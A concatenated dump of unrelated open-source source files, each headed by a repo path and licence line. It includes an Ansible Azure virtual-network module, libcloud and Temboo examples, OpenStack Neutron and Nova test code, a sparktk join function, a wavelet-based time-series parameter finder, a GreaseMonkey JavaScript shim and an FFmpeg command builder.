            results['dns_servers'].append(server)
    if vnet.address_space and len(vnet.address_space.address_prefixes) > 0:
        results['address_prefixes'] = []
        for space in vnet.address_space.address_prefixes:
            results['address_prefixes'].append(space)
    return results


class AzureRMVirtualNetwork(AzureRMModuleBase):
    '''Ansible module implementation managing a single Azure virtual network.'''

    def __init__(self):

        self.module_arg_spec = dict(
            resource_group=dict(type='str', required=True),
            name=dict(type='str', required=True),
            state=dict(type='str', default='present', choices=['present', 'absent']),
            location=dict(type='str'),
            address_prefixes_cidr=dict(type='list', aliases=['address_prefixes']),
            dns_servers=dict(type='list',),
            purge_address_prefixes=dict(type='bool', default=False, aliases=['purge']),
            purge_dns_servers=dict(type='bool', default=False),
        )

        # Purging DNS servers and supplying an explicit list are contradictory.
        mutually_exclusive = [
            ('dns_servers', 'purge_dns_servers')
        ]

        # Purging prefixes only makes sense when a replacement set is given.
        required_if = [
            ('purge_address_prefixes', True, ['address_prefixes_cidr'])
        ]

        self.resource_group = None
        self.name = None
        self.state = None
        self.location = None
        self.address_prefixes_cidr = None
        self.purge_address_prefixes = None
        self.dns_servers = None
        self.purge_dns_servers = None

        self.results = dict(
            changed=False,
            state=dict()
        )

        super(AzureRMVirtualNetwork, self).__init__(self.module_arg_spec,
                                                    mutually_exclusive=mutually_exclusive,
                                                    required_if=required_if,
                                                    supports_check_mode=True)

    def exec_module(self, **kwargs):
        '''
        Reconcile the requested state with the actual vnet state.

        Returns the standard module result dict with 'changed' and 'state' keys.
        '''
        for key in list(self.module_arg_spec.keys()) + ['tags']:
            setattr(self, key, kwargs[key])

        self.results['check_mode'] = self.check_mode

        resource_group = self.get_resource_group(self.resource_group)
        if not self.location:
            # Set default location
            self.location = resource_group.location

        if self.state == 'present':
            # FIX: validate any supplied prefixes up front. Previously this
            # check only ran when purge_address_prefixes was set, so invalid
            # CIDR values in the ordinary create/update path were passed
            # straight to the Azure API.
            if self.address_prefixes_cidr:
                for prefix in self.address_prefixes_cidr:
                    if not CIDR_PATTERN.match(prefix):
                        self.fail("Parameter error: invalid address prefix value {0}".format(prefix))

            if self.dns_servers and len(self.dns_servers) > 2:
                self.fail("Parameter error: You can provide a maximum of 2 DNS servers.")

        changed = False
        results = dict()

        try:
            self.log('Fetching vnet {0}'.format(self.name))
            vnet = self.network_client.virtual_networks.get(self.resource_group, self.name)

            results = virtual_network_to_dict(vnet)
            self.log('Vnet exists {0}'.format(self.name))
            self.log(results, pretty_print=True)
            self.check_provisioning_state(vnet, self.state)

            if self.state == 'present':
                if self.address_prefixes_cidr:
                    existing_address_prefix_set = set(vnet.address_space.address_prefixes)
                    requested_address_prefix_set = set(self.address_prefixes_cidr)
                    missing_prefixes = requested_address_prefix_set - existing_address_prefix_set
                    extra_prefixes = existing_address_prefix_set - requested_address_prefix_set
                    if len(missing_prefixes) > 0:
                        self.log('CHANGED: there are missing address_prefixes')
                        changed = True
                        if not self.purge_address_prefixes:
                            # add the missing prefixes
                            for prefix in missing_prefixes:
                                results['address_prefixes'].append(prefix)

                    if len(extra_prefixes) > 0 and self.purge_address_prefixes:
                        self.log('CHANGED: there are address_prefixes to purge')
                        changed = True
                        # replace existing address prefixes with requested set
                        results['address_prefixes'] = self.address_prefixes_cidr

                update_tags, results['tags'] = self.update_tags(results['tags'])
                if update_tags:
                    changed = True

                if self.dns_servers:
                    # FIX: dhcp_options may be None when the vnet has no custom
                    # DNS servers configured; treat that as an empty set instead
                    # of raising AttributeError.
                    existing_dns_set = set(vnet.dhcp_options.dns_servers) if vnet.dhcp_options else set()
                    requested_dns_set = set(self.dns_servers)
                    if existing_dns_set != requested_dns_set:
                        self.log('CHANGED: replacing DNS servers')
                        changed = True
                        results['dns_servers'] = self.dns_servers

                if self.purge_dns_servers and vnet.dhcp_options and len(vnet.dhcp_options.dns_servers) > 0:
                    self.log('CHANGED: purging existing DNS servers')
                    changed = True
                    results['dns_servers'] = []
            elif self.state == 'absent':
                self.log("CHANGED: vnet exists but requested state is 'absent'")
                changed = True
        except CloudError:
            # A CloudError from get() means the vnet does not exist yet.
            self.log('Vnet {0} does not exist'.format(self.name))
            if self.state == 'present':
                self.log("CHANGED: vnet {0} does not exist but requested state is 'present'".format(self.name))
                changed = True

        self.results['changed'] = changed
        self.results['state'] = results

        if self.check_mode:
            # Report what would change without touching the cloud.
            return self.results

        if changed:
            if self.state == 'present':
                if not results:
                    # create a new virtual network
                    self.log("Create virtual network {0}".format(self.name))
                    if not self.address_prefixes_cidr:
                        self.fail('Parameter error: address_prefixes_cidr required when creating a virtual network')
                    vnet = VirtualNetwork(
                        location=self.location,
                        address_space=AddressSpace(
                            address_prefixes=self.address_prefixes_cidr
                        )
                    )
                    if self.dns_servers:
                        vnet.dhcp_options = DhcpOptions(
                            dns_servers=self.dns_servers
                        )
                    if self.tags:
                        vnet.tags = self.tags
                    self.results['state'] = self.create_or_update_vnet(vnet)
                else:
                    # update existing virtual network
                    self.log("Update virtual network {0}".format(self.name))
                    vnet = VirtualNetwork(
                        location=results['location'],
                        address_space=AddressSpace(
                            address_prefixes=results['address_prefixes']
                        ),
                        tags=results['tags']
                    )
                    if results.get('dns_servers'):
                        vnet.dhcp_options = DhcpOptions(
                            dns_servers=results['dns_servers']
                        )
                    self.results['state'] = self.create_or_update_vnet(vnet)
            elif self.state == 'absent':
                self.delete_virtual_network()
                self.results['state']['status'] = 'Deleted'

        return self.results

    def create_or_update_vnet(self, vnet):
        '''
        Issue the create_or_update call and wait for the long-running
        operation to finish. Returns the resulting vnet as a dict.
        '''
        try:
            poller = self.network_client.virtual_networks.create_or_update(self.resource_group, self.name, vnet)
            new_vnet = self.get_poller_result(poller)
        except Exception as exc:
            self.fail("Error creating or updating virtual network {0} - {1}".format(self.name, str(exc)))
        return virtual_network_to_dict(new_vnet)

    def delete_virtual_network(self):
        '''
        Delete the vnet and wait for the long-running operation to finish.
        '''
        try:
            poller = self.network_client.virtual_networks.delete(self.resource_group, self.name)
            result = self.get_poller_result(poller)
        except Exception as exc:
            self.fail("Error deleting virtual network {0} - {1}".format(self.name, str(exc)))
        return result


def main():
    AzureRMVirtualNetwork()

if __name__ == '__main__':
    main()
gpl-3.0
kater169/libcloud
example_compute.py
53
1403
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver

EC2 = get_driver(Provider.EC2)
Rackspace = get_driver(Provider.RACKSPACE)

drivers = [EC2('access key id', 'secret key', region='us-east-1'),
           Rackspace('username', 'api key', region='iad')]

# FIX: flatten into a single list of Node objects.  The original
# `[driver.list_nodes() for driver in drivers]` produced a list of lists,
# so the `n.name` filter below raised AttributeError (a list has no .name).
nodes = [node for driver in drivers for node in driver.list_nodes()]

print(nodes)
# [ <Node: provider=Amazon, status=RUNNING, name=bob, ip=1.2.3.4.5>,
# <Node: provider=Rackspace, status=REBOOT, name=korine, ip=6.7.8.9.10>, ... ]

# grab the node named "test"
node = [n for n in nodes if n.name == 'test'][0]

# reboot "test"
node.reboot()
apache-2.0
willprice/arduino-sphere-project
scripts/example_direction_finder/temboo/Library/Labs/GetWeather/ByAddress.py
5
3288
# -*- coding: utf-8 -*-

###############################################################################
#
# ByAddress
# Retrieves weather and UV index data for a given Geo point using the Yahoo
# Weather and EnviroFacts APIs.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################

# NOTE: this module follows the standard Temboo SDK generated-code layout:
# one Choreography class plus companion InputSet / ResultSet / Execution
# classes wired together through the factory methods below.

from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution

import json

class ByAddress(Choreography):
    """
    Choreography wrapper for the /Library/Labs/GetWeather/ByAddress Temboo Choreo.
    """

    def __init__(self, temboo_session):
        """
        Create a new instance of the ByAddress Choreo. A TembooSession object, containing a valid
        set of Temboo credentials, must be supplied.
        """
        super(ByAddress, self).__init__(temboo_session, '/Library/Labs/GetWeather/ByAddress')

    def new_input_set(self):
        # Factory hook used by the Temboo core to build a typed input set.
        return ByAddressInputSet()

    def _make_result_set(self, result, path):
        # Factory hook used by the Temboo core to wrap raw results.
        return ByAddressResultSet(result, path)

    def _make_execution(self, session, exec_id, path):
        # Factory hook used by the Temboo core for async executions.
        return ByAddressChoreographyExecution(session, exec_id, path)

class ByAddressInputSet(InputSet):
    """
    An InputSet with methods appropriate for specifying the inputs to the ByAddress
    Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
    """
    def set_APICredentials(self, value):
        """
        Set the value of the APICredentials input for this Choreo. ((optional, json) A JSON dictionary containing a Yahoo App ID. See Choreo documentation for formatting examples.)
        """
        super(ByAddressInputSet, self)._set_input('APICredentials', value)
    def set_Address(self, value):
        """
        Set the value of the Address input for this Choreo. ((required, string) The street address of the location to get weather for.)
        """
        super(ByAddressInputSet, self)._set_input('Address', value)

class ByAddressResultSet(ResultSet):
    """
    A ResultSet with methods tailored to the values returned by the ByAddress Choreo.
    The ResultSet object is used to retrieve the results of a Choreo execution.
    """

    # NOTE(review): the parameter name shadows the builtin `str`; it is kept
    # as-is because this is generated code and renaming would change the
    # keyword-argument interface.
    def getJSONFromString(self, str):
        return json.loads(str)

    def get_Response(self):
        """
        Retrieve the value for the "Response" output from this Choreo execution. ((json) Contains combined weather data from Yahoo Weather and EnviroFacts.)
        """
        return self._output.get('Response', None)

class ByAddressChoreographyExecution(ChoreographyExecution):

    def _make_result_set(self, response, path):
        # Wrap the raw execution response in the typed result set.
        return ByAddressResultSet(response, path)
gpl-2.0
apporc/neutron
neutron/tests/unit/api/rpc/handlers/test_dvr_rpc.py
34
2111
# Copyright (c) 2015 OpenStack Foundation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import mock from neutron.api.rpc.handlers import dvr_rpc from neutron.tests import base class DVRServerRpcApiTestCase(base.BaseTestCase): def setUp(self): self.client_p = mock.patch.object(dvr_rpc.n_rpc, "get_client") self.client = self.client_p.start() self.rpc = dvr_rpc.DVRServerRpcApi('fake_topic') self.mock_cctxt = self.rpc.client.prepare.return_value self.ctxt = mock.ANY super(DVRServerRpcApiTestCase, self).setUp() def test_get_dvr_mac_address_by_host(self): self.rpc.get_dvr_mac_address_by_host(self.ctxt, 'foo_host') self.mock_cctxt.call.assert_called_with( self.ctxt, 'get_dvr_mac_address_by_host', host='foo_host') def test_get_dvr_mac_address_list(self): self.rpc.get_dvr_mac_address_list(self.ctxt) self.mock_cctxt.call.assert_called_with( self.ctxt, 'get_dvr_mac_address_list') def test_get_ports_on_host_by_subnet(self): self.rpc.get_ports_on_host_by_subnet( self.ctxt, 'foo_host', 'foo_subnet') self.mock_cctxt.call.assert_called_with( self.ctxt, 'get_ports_on_host_by_subnet', host='foo_host', subnet='foo_subnet') def test_get_subnet_for_dvr(self): self.rpc.get_subnet_for_dvr( self.ctxt, 'foo_subnet', fixed_ips='foo_fixed_ips') self.mock_cctxt.call.assert_called_with( self.ctxt, 'get_subnet_for_dvr', subnet='foo_subnet', fixed_ips='foo_fixed_ips')
apache-2.0
rodorad/spark-tk
python/sparktk/frame/ops/join_outer.py
14
6672
# vim: set encoding=utf-8

# Copyright (c) 2016 Intel Corporation 
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#       http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

def join_outer(self, right, left_on, right_on=None):
    """
    Perform a SQL-style full outer join of this frame (the 'left' side) with
    another frame, producing a new frame.

    The join matches the values of ``left_on`` column(s) in this frame against
    the ``right_on`` column(s) in *right*.  An outer join keeps rows from both
    frames even where no match exists in the other frame; unmatched cells are
    filled with missing values.

    Parameters
    ----------
    :param right: (Frame) Another frame to join with
    :param left_on: (List[str]) Names of the columns in the left frame used to
        match up the two frames.  A single column name may be given as a plain
        string.
    :param right_on: (Optional[List[str]]) Names of the columns in the right
        frame used to match up the two frames.  Defaults to the same names as
        ``left_on``.
    :returns: (Frame) A new frame with the results of the join

    Notes
    -----
    When a column is named the same in both frames, the result contains both:
    the left frame's copy gets an ``_L`` suffix and the right frame's copy an
    ``_R`` suffix.  Column order in the result is not guaranteed, so consider
    renaming columns to meaningful terms before joining.
    """
    # Normalize the left key(s): reject a missing value, accept a bare string.
    if left_on is None:
        raise ValueError("Please provide column name on which join should be performed")
    if isinstance(left_on, basestring):
        left_on = [left_on]

    # Normalize the right key(s); default to joining on identically named columns.
    if right_on is None:
        right_on = left_on
    if isinstance(right_on, basestring):
        right_on = [right_on]

    if len(left_on) != len(right_on):
        raise ValueError("Please provide equal number of join columns")

    from sparktk.frame.frame import Frame

    # Bridge the Python column lists across to the Scala implementation.
    convert = self._tc.jutils.convert
    scala_left_cols = convert.to_scala_list_string(left_on)
    scala_right_cols = convert.to_scala_option(convert.to_scala_list_string(right_on))

    joined = self._scala.joinOuter(right._scala, scala_left_cols, scala_right_cols)
    return Frame(self._tc, joined)
apache-2.0
numenta-archive/htmresearch
htmresearch/frameworks/utils/param_finder.py
9
12312
# ---------------------------------------------------------------------- # Numenta Platform for Intelligent Computing (NuPIC) # Copyright (C) 2015, Numenta, Inc. Unless you have an agreement # with Numenta, Inc., for a separate license for this software code, the # following terms and conditions apply: # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero Public License version 3 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Affero Public License for more details. # # You should have received a copy of the GNU Affero Public License # along with this program. If not, see http://www.gnu.org/licenses. # # http://numenta.org/licenses/ # ---------------------------------------------------------------------- """ Automatically find data aggregation window and suggest whether to use TimeOfDay and DayOfWeek encoder. Example usage: (timestamps, values) = read_csv_files('example_data/art_daily_flatmiddle.csv') (med_sampling_interval, new_sampling_interval, useTimeOfDay, useDayOfWeek) = get_suggested_timescale_and_encoder(timestamps, values) """ import csv import numpy as np _mode_from_name_dict = { 'v': 0, 's': 1, 'f': 2 } def _convolve(a, v, mode='full'): """ Returns the discrete, linear convolution of two one-dimensional sequences. The convolution operator is often seen in signal processing, where it models the effect of a linear time-invariant system on a signal [1]_. In probability theory, the sum of two independent random variables is distributed according to the convolution of their individual distributions. If `v` is longer than `a`, the arrays are swapped before computation. Parameters ---------- a : (N,) array_like First one-dimensional input array. v : (M,) array_like Second one-dimensional input array. 
mode : {'full', 'valid', 'same'}, optional 'full': By default, mode is 'full'. This returns the convolution at each point of overlap, with an output shape of (N+M-1,). At the end-points of the convolution, the signals do not overlap completely, and boundary effects may be seen. 'same': Mode `same` returns output of length ``max(M, N)``. Boundary effects are still visible. 'valid': Mode `valid` returns output of length ``max(M, N) - min(M, N) + 1``. The convolution product is only given for points where the signals overlap completely. Values outside the signal boundary have no effect. Returns ------- out : ndarray Discrete, linear convolution of `a` and `v`. References ---------- .. [1] Wikipedia, "Convolution", http://en.wikipedia.org/wiki/Convolution. """ a, v = np.array(a, ndmin=1), np.array(v, ndmin=1) if len(v) > len(a): a, v = v, a if len(a) == 0: raise ValueError('a cannot be empty') if len(v) == 0: raise ValueError('v cannot be empty') mode = _mode_from_name(mode) return np.core.multiarray.correlate(a, v[::-1], mode) def _mode_from_name(mode): if isinstance(mode, basestring): return _mode_from_name_dict[mode.lower()[0]] return mode def _ricker_wavelet(points, a): """ Return a Ricker wavelet, also known as the "Mexican hat wavelet". It models the function: ``A (1 - x^2/a^2) exp(-t^2/a^2)``, where ``A = 2/sqrt(3a)pi^1/3``. Parameters ---------- points : int Number of points in `vector`. Will be centered around 0. a : scalar Width parameter of the wavelet. Returns ------- vector : (N,) ndarray Array of length `points` in shape of ricker curve. """ A = 2 / (np.sqrt(3 * a) * (np.pi ** 0.25)) wsq = a ** 2 vec = np.arange(0, points) - (points - 1.0) / 2 tsq = vec ** 2 mod = (1 - tsq / wsq) gauss = np.exp(-tsq / (2 * wsq)) total = A * mod * gauss return total def _cwt(data, wavelet, widths): """ Continuous wavelet transform. Performs a continuous wavelet transform on `data`, using the `wavelet` function. 
A CWT performs a convolution with `data` using the `wavelet` function, which is characterized by a width parameter and length parameter. Parameters ---------- data : (N,) ndarray data on which to perform the transform. wavelet : function Wavelet function, which should take 2 arguments. The first argument is the number of points that the returned vector will have (len(wavelet(width,length)) == length). The second is a width parameter, defining the size of the wavelet (e.g. standard deviation of a gaussian). See `ricker`, which satisfies these requirements. widths : (M,) sequence Widths to use for transform. Returns ------- cwt: (M, N) ndarray Will have shape of (len(data), len(widths)). """ output = np.zeros([len(widths), len(data)]) for ind, width in enumerate(widths): wavelet_data = wavelet(min(10 * width, len(data)), width) output[ind, :] = _convolve(data, wavelet_data, mode='same') return output def read_csv_files(fileName): """ Read csv data file, the data file must have two columns with header "timestamp", and "value" """ fileReader = csv.reader(open(fileName, 'r')) fileReader.next() # skip header line timestamps = [] values = [] for row in fileReader: timestamps.append(row[0]) values.append(row[1]) timestamps = np.array(timestamps, dtype='datetime64') values = np.array(values, dtype='float32') return timestamps, values def resample_data(timestamp, sig, new_sampling_interval): """ Resample time series data at new sampling interval using linear interpolation. Note: the resampling function is using interpolation, it may not be appropriate for aggregation purpose :param timestamp: timestamp in numpy datetime64 type :param sig: value of the time series. :param new_sampling_interval: new sampling interval. 
""" nSampleNew = np.floor((timestamp[-1] - timestamp[0]) / new_sampling_interval).astype('int') + 1 timestamp_new = np.empty(nSampleNew, dtype='datetime64[s]') for sampleI in xrange(nSampleNew): timestamp_new[sampleI] = timestamp[0] + sampleI * new_sampling_interval sig_new = np.interp((timestamp_new - timestamp[0]).astype('float32'), (timestamp - timestamp[0]).astype('float32'), sig) return timestamp_new, sig_new def calculate_cwt(sampling_interval, value): """ Calculate continuous wavelet transformation (CWT) Return variance of the cwt coefficients overtime and its cumulative distribution :param sampling_interval: sampling interval of the time series :param value: value of the time series """ #t = np.array(range(len(value))) * sampling_interval widths = np.logspace(0, np.log10(len(value) / 20), 50) T = int(widths[-1]) # continuous wavelet transformation with ricker wavelet cwtmatr = _cwt(value, _ricker_wavelet, widths) cwtmatr = cwtmatr[:, 4 * T:-4 * T] #value = value[4 * T:-4 * T] #t = t[4 * T:-4 * T] #freq = 1 / widths.astype('float') / sampling_interval / 4 time_scale = widths * sampling_interval * 4 # variance of wavelet power cwt_var = np.var(np.abs(cwtmatr), axis=1) cwt_var = cwt_var / np.sum(cwt_var) return cwtmatr, cwt_var, time_scale def get_local_maxima(cwt_var, time_scale): """ Find local maxima from the wavelet coefficient variance spectrum A strong maxima is defined as (1) At least 10% higher than the nearest local minima (2) Above the baseline value The algorithm will suggest an encoder if its corresponding periodicity is close to a strong maxima: (1) horizontally must within the nearest local minimum (2) vertically must within 50% of the peak of the strong maxima """ # peak & valley detection local_min = (np.diff(np.sign(np.diff(cwt_var))) > 0).nonzero()[0] + 1 local_max = (np.diff(np.sign(np.diff(cwt_var))) < 0).nonzero()[0] + 1 baseline_value = 1.0 / len(cwt_var) dayPeriod = 86400.0 weekPeriod = 604800.0 cwt_var_at_dayPeriod = 
np.interp(dayPeriod, time_scale, cwt_var) cwt_var_at_weekPeriod = np.interp(weekPeriod, time_scale, cwt_var) useTimeOfDay = False useDayOfWeek = False strong_local_max = [] for i in xrange(len(local_max)): left_local_min = np.where(np.less(local_min, local_max[i]))[0] if len(left_local_min) == 0: left_local_min = 0 left_local_min_value = cwt_var[0] else: left_local_min = local_min[left_local_min[-1]] left_local_min_value = cwt_var[left_local_min] right_local_min = np.where(np.greater(local_min, local_max[i]))[0] if len(right_local_min) == 0: right_local_min = len(cwt_var) - 1 right_local_min_value = cwt_var[-1] else: right_local_min = local_min[right_local_min[0]] right_local_min_value = cwt_var[right_local_min] local_max_value = cwt_var[local_max[i]] nearest_local_min_value = np.max(left_local_min_value, right_local_min_value) if ((local_max_value - nearest_local_min_value) / nearest_local_min_value > 0.1 and local_max_value > baseline_value): strong_local_max.append(local_max[i]) if (time_scale[left_local_min] < dayPeriod < time_scale[right_local_min] and cwt_var_at_dayPeriod > local_max_value * 0.5): useTimeOfDay = True if (time_scale[left_local_min] < weekPeriod < time_scale[right_local_min] and cwt_var_at_weekPeriod > local_max_value * 0.5): useDayOfWeek = True return useTimeOfDay, useDayOfWeek, local_min, local_max, strong_local_max def determine_aggregation_window(time_scale, cum_cwt_var, thresh, dt_sec, data_length): cutoff_time_scale = time_scale[np.where(cum_cwt_var >= thresh)[0][0]] aggregation_time_scale = cutoff_time_scale / 10.0 if aggregation_time_scale < dt_sec * 4: aggregation_time_scale = dt_sec * 4 if data_length < 1000: aggregation_time_scale = dt_sec else: # make sure there is > 1000 records after aggregation dt_max = float(data_length) / 1000.0 * dt_sec if aggregation_time_scale > dt_max > dt_sec: aggregation_time_scale = dt_max return aggregation_time_scale def get_suggested_timescale_and_encoder(timestamp, value, thresh=0.2): """ Recommend 
aggregation timescales and encoder types for time series data :param timestamp: sampling times of the time series :param value: value of the time series :param thresh: aggregation threshold (default value based on experiments with NAB data) :return med_sampling_interval: median sampling interval in seconds :return: new_sampling_interval, a string for suggested sampling interval (e.g., 300000ms) :return: useTimeOfDay, a bool variable for whether to use time of day encoder :return: useDayOfWeek, a bool variable for whether to use day of week encoder """ # The data may have inhomogeneous sampling rate, here we take the median # of the sampling intervals and resample the data with the same sampling # intervals dt = np.median(np.diff(timestamp)) med_sampling_interval = dt.astype('float32') (timestamp, value) = resample_data(timestamp, value, dt) (cwtmatr, cwt_var, time_scale) = calculate_cwt(med_sampling_interval, value) cum_cwt_var = np.cumsum(cwt_var) # decide aggregation window new_sampling_interval = determine_aggregation_window(time_scale, cum_cwt_var, thresh, med_sampling_interval, len(value)) new_sampling_interval = str(int(new_sampling_interval * 1000)) + 'ms' # decide whether to use TimeOfDay and DayOfWeek encoders (useTimeOfDay, useDayOfWeek, local_min, local_max, strong_local_max) = get_local_maxima(cwt_var, time_scale) return (med_sampling_interval, new_sampling_interval, useTimeOfDay, useDayOfWeek)
agpl-3.0
paulmadore/Eric-IDE
6-6.0.9/eric/Helpviewer/GreaseMonkey/GreaseMonkeyJavaScript.py
2
3586
# -*- coding: utf-8 -*- # Copyright (c) 2012 - 2015 Detlev Offenbach <detlev@die-offenbachs.de> # """ Module containing some JavaScript resources. """ from __future__ import unicode_literals bootstrap_js = """ if(typeof GM_xmlhttpRequest === "undefined") { GM_xmlhttpRequest = function(/* object */ details) { details.method = details.method.toUpperCase() || "GET"; if(!details.url) { throw("GM_xmlhttpRequest requires an URL."); } // build XMLHttpRequest object var oXhr = new XMLHttpRequest; // run it if(oXhr) { if("onreadystatechange" in details) oXhr.onreadystatechange = function() { details.onreadystatechange(oXhr) }; if("onload" in details) oXhr.onload = function() { details.onload(oXhr) }; if("onerror" in details) oXhr.onerror = function() { details.onerror(oXhr) }; oXhr.open(details.method, details.url, true); if("headers" in details) for(var header in details.headers) oXhr.setRequestHeader(header, details.headers[header]); if("data" in details) oXhr.send(details.data); else oXhr.send(); } else throw ("This Browser is not supported, please upgrade.") } } if(typeof GM_addStyle === "undefined") { function GM_addStyle(/* String */ styles) { var head = document.getElementsByTagName("head")[0]; if (head === undefined) { document.onreadystatechange = function() { if (document.readyState == "interactive") { var oStyle = document.createElement("style"); oStyle.setAttribute("type", "text\/css"); oStyle.appendChild(document.createTextNode(styles)); document.getElementsByTagName("head")[0].appendChild(oStyle); } } } else { var oStyle = document.createElement("style"); oStyle.setAttribute("type", "text\/css"); oStyle.appendChild(document.createTextNode(styles)); head.appendChild(oStyle); } } } if(typeof GM_log === "undefined") { function GM_log(log) { if(console) console.log(log); } } if(typeof GM_openInTab === "undefined") { function GM_openInTab(url) { window.open(url) } } // Define unsafe window var unsafeWindow = window; window.wrappedJSObject = unsafeWindow; // 
GM_registerMenuCommand not supported if(typeof GM_registerMenuCommand === "undefined") { function GM_registerMenuCommand(caption, commandFunc, accessKey) { } } // GM Resource not supported if(typeof GM_getResourceText === "undefined") { function GM_getResourceText(resourceName) { throw ("eric6 Web Browser: GM Resource is not supported!"); } } if(typeof GM_getResourceURL === "undefined") { function GM_getResourceURL(resourceName) { throw ("eric6 Web Browser: GM Resource is not supported!"); } } // GM Settings not supported if(typeof GM_getValue === "undefined") { function GM_getValue(name, defaultValue) { return defaultValue; } } if(typeof GM_setValue === "undefined") { function GM_setValue(name, value) { } } if(typeof GM_deleteValue === "undefined") { function GM_deleteValue(name) { } } if(typeof GM_listValues === "undefined") { function GM_listValues() { return new Array(""); } } """
gpl-3.0
terabit-software/dynamic-stream-server
dss/tools/ffmpeg.py
2
3206
from __future__ import absolute_import import shlex from ..config import config bin_default = config.get('ffmpeg', 'bin') probe = config.get('ffmpeg', 'probe') def _input_cmd(cmd_input, input, add_probe=True, bin=None, add_bin=True): """ Base of FFmpeg command with a single input. """ if add_bin: args = [bin_default if bin is None else bin] else: args = [] if cmd_input is None: raise ValueError('Passing `None` on `cmd_input` will cause ' 'shlex.split to hang instead of raising error.') args += shlex.split(cmd_input) if add_probe: args += ['-probesize', probe] args += ['-i', input] return args def cmd(cmd_input, input, cmd_output, output, add_probe=True, bin=None): """ Build FFmpeg command for a single input and single output. """ args = _input_cmd(cmd_input, input, add_probe, bin) args += shlex.split(cmd_output) args.append(output) return args def cmd_inputs(cmd_input, inputs, cmd_output, output, add_probe=True, bin=None): """ Build FFmpeg command for multiple input files and a single output. If an item on the `input` list is a 2-item tuple, it will be unpacked into input command for this input and the input. E.g.: ['audio_file.mp4', ('-f mpegts', 'video_stream')] """ args = [] cmd_input_ = cmd_input for ix, inp in enumerate(inputs): if cmd_input is None: cmd_input_, inp = inp if isinstance(inp, tuple): cmd_input_ += ' ' + inp[0] inp = inp[1] args += _input_cmd(cmd_input_, inp, add_probe, bin, add_bin=not ix) cmd_input_ = cmd_input args += shlex.split(cmd_output) args.append(output) return args def cmd_outputs(cmd_input, input, base_cmd_output, cmd_output_specific, outputs, add_probe=True, bin=None): """ Build FFmpeg command for multiple outputs but single input. 
""" args = _input_cmd(cmd_input, input, add_probe, bin) base_cmd_output = shlex.split(base_cmd_output) for out_cmd, out in zip(cmd_output_specific, outputs): args += base_cmd_output args += shlex.split(out_cmd) args.append(out) return args def cmd_inputs_outputs(cmd_input, inputs, base_cmd_output, cmd_output_specific, outputs, add_probe=True, bin=None): """ Build FFmpeg command for multiple input files and a multiple outputs. If an item on the `input` list is a 2-item tuple, it will be unpacked into input command for this input and the input. E.g.: ['audio_file.mp4', ('-f mpegts', 'video_stream')] """ args = [] cmd_input_ = cmd_input for ix, inp in enumerate(inputs): if cmd_input is None: cmd_input_, inp = inp if isinstance(inp, tuple): cmd_input_ += ' ' + inp[0] inp = inp[1] args += _input_cmd(cmd_input_, inp, add_probe, bin, add_bin=not ix) cmd_input_ = cmd_input base_cmd_output = shlex.split(base_cmd_output) for out_cmd, out in zip(cmd_output_specific, outputs): args += base_cmd_output args += shlex.split(out_cmd) args.append(out) return args
bsd-3-clause
psiwczak/openstack
nova/tests/api/openstack/compute/extensions/foxinsocks.py
33
2984
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2011 OpenStack LLC. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import webob.exc from nova.api.openstack import extensions from nova.api.openstack import wsgi class FoxInSocksController(object): def index(self, req): return "Try to say this Mr. Knox, sir..." class FoxInSocksServerControllerExtension(wsgi.Controller): @wsgi.action('add_tweedle') def _add_tweedle(self, req, id, body): return "Tweedle Beetle Added." @wsgi.action('delete_tweedle') def _delete_tweedle(self, req, id, body): return "Tweedle Beetle Deleted." @wsgi.action('fail') def _fail(self, req, id, body): raise webob.exc.HTTPBadRequest(explanation='Tweedle fail') class FoxInSocksFlavorGooseControllerExtension(wsgi.Controller): @wsgi.extends def show(self, req, resp_obj, id): #NOTE: This only handles JSON responses. # You can use content type header to test for XML. resp_obj.obj['flavor']['googoose'] = req.GET.get('chewing') class FoxInSocksFlavorBandsControllerExtension(wsgi.Controller): @wsgi.extends 